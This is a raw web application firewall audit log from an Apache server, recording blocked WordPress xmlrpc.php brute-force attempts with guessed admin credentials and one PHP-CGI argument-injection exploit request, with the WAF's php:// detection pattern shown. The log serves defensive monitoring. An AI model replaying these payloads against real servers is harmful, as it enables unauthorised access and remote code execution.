IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099805069013 5679 (- - -) Stopwatch2: 1749099805069013 5679; combined=4016, p1=540, p2=3310, p3=0, p4=0, p5=98, sr=103, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcab7b6a-Z-- --feea7c7e-A-- [05/Jun/2025:12:03:26 +0700] aEElHn-K7ToMdu-YSIIkTQAAABg 103.236.140.4 35112 103.236.140.4 8181 --feea7c7e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --feea7c7e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2022 --feea7c7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --feea7c7e-E-- --feea7c7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099806125699 4668 (- - -) Stopwatch2: 1749099806125699 4668; combined=3413, p1=423, p2=2839, p3=0, p4=0, p5=88, sr=87, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --feea7c7e-Z-- --f25ab641-A-- [05/Jun/2025:12:05:15 +0700] aEEli1wdJdhOudw5hdzO2QAAAJM 103.236.140.4 35196 103.236.140.4 8181 --f25ab641-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f25ab641-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2017 --f25ab641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f25ab641-E-- --f25ab641-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099915435993 5250 (- - -) Stopwatch2: 1749099915435993 5250; combined=3901, p1=468, p2=3263, p3=0, p4=0, p5=100, sr=109, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f25ab641-Z-- --0fd72a2b-A-- [05/Jun/2025:12:06:22 +0700] aEElzlwdJdhOudw5hdzO3QAAAJg 103.236.140.4 35222 103.236.140.4 8181 --0fd72a2b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0fd72a2b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin2017 --0fd72a2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fd72a2b-E-- --0fd72a2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099982497895 5096 (- - -) Stopwatch2: 1749099982497895 5096; combined=3819, p1=422, p2=3222, p3=0, p4=0, p5=105, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fd72a2b-Z-- --2d6c3508-A-- [05/Jun/2025:12:06:56 +0700] aEEl8Oth7G2xELALzPYgqQAAAM0 103.236.140.4 35252 103.236.140.4 8181 --2d6c3508-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2d6c3508-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh@789 --2d6c3508-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d6c3508-E-- --2d6c3508-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100016352752 4778 (- - -) Stopwatch2: 1749100016352752 4778; combined=3637, p1=400, p2=3069, p3=0, p4=0, p5=98, sr=83, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d6c3508-Z-- --09f41321-A-- [05/Jun/2025:12:06:56 +0700] aEEl8Oth7G2xELALzPYgqwAAANI 103.236.140.4 35256 103.236.140.4 8181 --09f41321-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --09f41321-C-- --09f41321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09f41321-E-- --09f41321-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100016931378 2662 (- - -) Stopwatch2: 1749100016931378 2662; combined=1680, p1=354, p2=1298, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09f41321-Z-- --5a21ed73-A-- [05/Jun/2025:12:08:38 +0700] aEEmVuth7G2xELALzPYgswAAAMI 103.236.140.4 35282 103.236.140.4 8181 --5a21ed73-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5a21ed73-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh2 --5a21ed73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a21ed73-E-- --5a21ed73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100118489175 5822 (- - -) Stopwatch2: 1749100118489175 5822; combined=4150, p1=495, p2=3489, p3=0, p4=0, p5=98, sr=91, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a21ed73-Z-- --bc501073-A-- [05/Jun/2025:12:08:47 +0700] aEEmX-th7G2xELALzPYgtAAAAMM 103.236.140.4 35284 103.236.140.4 8181 --bc501073-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 143.244.185.159 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 143.244.185.159 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bc501073-C-- system.multicallmethodNamewp.getUsersBlogsparamskpopvisualsantix --bc501073-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc501073-E-- --bc501073-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 143.244.185.159 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100127954543 5358 (- - -) Stopwatch2: 1749100127954543 5358; combined=3922, p1=462, p2=3293, p3=0, p4=0, p5=99, sr=85, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc501073-Z-- --0515f977-A-- [05/Jun/2025:12:08:59 +0700] aEEma1wdJdhOudw5hdzO5gAAAIg 103.236.140.4 35298 103.236.140.4 8181 --0515f977-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0515f977-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin2014 --0515f977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0515f977-E-- --0515f977-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100139481902 4607 (- - -) Stopwatch2: 1749100139481902 4607; combined=3583, p1=407, p2=3006, p3=0, p4=0, p5=99, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0515f977-Z-- --ed791c0f-A-- [05/Jun/2025:12:09:01 +0700] aEEmbeth7G2xELALzPYguQAAAMc 103.236.140.4 35300 103.236.140.4 8181 --ed791c0f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.21.131 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.21.131 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ed791c0f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh00 --ed791c0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed791c0f-E-- --ed791c0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.21.131 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100141403706 6436 (- - -) Stopwatch2: 1749100141403706 6436; combined=4354, p1=529, p2=3663, p3=0, p4=0, p5=99, sr=89, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed791c0f-Z-- --2575d742-A-- [05/Jun/2025:12:09:47 +0700] aEEmm-th7G2xELALzPYgwQAAAM4 103.236.140.4 35318 103.236.140.4 8181 --2575d742-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2575d742-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin@1 --2575d742-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2575d742-E-- --2575d742-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100187922361 4542 (- - -) Stopwatch2: 1749100187922361 4542; combined=3545, p1=366, p2=2990, p3=0, p4=0, p5=108, sr=79, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2575d742-Z-- --954da211-A-- [05/Jun/2025:12:10:29 +0700] aEEmxeth7G2xELALzPYgxwAAANY 103.236.140.4 35338 103.236.140.4 8181 --954da211-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --954da211-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin!23 --954da211-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --954da211-E-- --954da211-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100229163185 5376 (- - -) Stopwatch2: 1749100229163185 5376; combined=3874, p1=464, p2=3237, p3=0, p4=0, p5=101, sr=88, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --954da211-Z-- --d3c7db31-A-- [05/Jun/2025:12:10:55 +0700] aEEm3-th7G2xELALzPYgywAAAMM 103.236.140.4 35346 103.236.140.4 8181 --d3c7db31-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d3c7db31-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh21 --d3c7db31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3c7db31-E-- --d3c7db31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100255807938 5127 (- - -) Stopwatch2: 1749100255807938 5127; combined=3786, p1=470, p2=3143, p3=0, p4=0, p5=102, sr=112, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3c7db31-Z-- --cff7cf35-A-- [05/Jun/2025:12:10:59 +0700] aEEm4-th7G2xELALzPYgzAAAAMA 103.236.140.4 35348 103.236.140.4 8181 --cff7cf35-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cff7cf35-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix2022 --cff7cf35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cff7cf35-E-- --cff7cf35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100259555236 4542 (- - -) Stopwatch2: 1749100259555236 4542; combined=3465, p1=365, p2=2941, p3=0, p4=0, p5=93, sr=76, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cff7cf35-Z-- --777f9918-A-- [05/Jun/2025:12:11:20 +0700] aEEm-Oth7G2xELALzPYg0wAAAMs 103.236.140.4 35368 103.236.140.4 8181 --777f9918-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --777f9918-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin12345! --777f9918-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --777f9918-E-- --777f9918-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100280689518 5582 (- - -) Stopwatch2: 1749100280689518 5582; combined=3966, p1=492, p2=3300, p3=0, p4=0, p5=102, sr=95, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --777f9918-Z-- --b66a6449-A-- [05/Jun/2025:12:11:31 +0700] aEEnA-th7G2xELALzPYg1gAAAM8 103.236.140.4 35376 103.236.140.4 8181 --b66a6449-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b66a6449-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin123!!! --b66a6449-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b66a6449-E-- --b66a6449-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100291915052 4837 (- - -) Stopwatch2: 1749100291915052 4837; combined=3724, p1=423, p2=3138, p3=0, p4=0, p5=96, sr=76, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b66a6449-Z-- --0efd071e-A-- [05/Jun/2025:12:11:38 +0700] aEEnCuth7G2xELALzPYg1wAAAM4 103.236.140.4 35378 103.236.140.4 8181 --0efd071e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 